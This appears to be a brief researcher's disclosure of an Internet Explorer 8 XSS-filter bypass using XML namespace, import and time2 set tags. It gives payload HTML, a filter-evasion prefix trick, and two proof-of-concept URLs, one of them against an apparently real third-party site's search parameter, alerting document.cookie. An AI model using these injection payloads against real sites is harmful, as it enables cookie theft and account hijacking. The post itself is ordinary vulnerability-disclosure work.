IE8 xss filter bypass
Note: IE 10 have fixed this issue,and IE8 …
————————————————-
1. a <?import … > tag can also be written as a <import …> tag.
<html>
<body>
<div>
<div id="x">x</div>
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
</div>
</body>
</html>
the code above will execute script fragment in “to” attribute.
Furthermore, we found this xss vector contructed from the three tags (<xml> <import> & <t:set …>) can bypass the IE8 xss filter.
————————————————-
POC1: use <import …>
http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>
while using <?import …> will trigger the xss filter to intercept our code.
2. Our code should start with “>, when we encounter the case like : <input type=”text” value=”{parameter under controlled}”>. The “> will trigger the xss filter, and it will replace some words like ‘namespace’ and ‘attributeName’ in our code. My friend @jackmasa (https://twitter.com/jackmasa)(@xxx in Wooyun.org) gave me a trick to solve the problem: “x> (x represents any letter) cannot trigger the filter.
————————————————-
POC2:
http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>
That’s all. Thanks for help from my friend jackmasa (@xxx in Wooyun.org).
Author: Gainover
Group: PKAV .net & Wooyun.org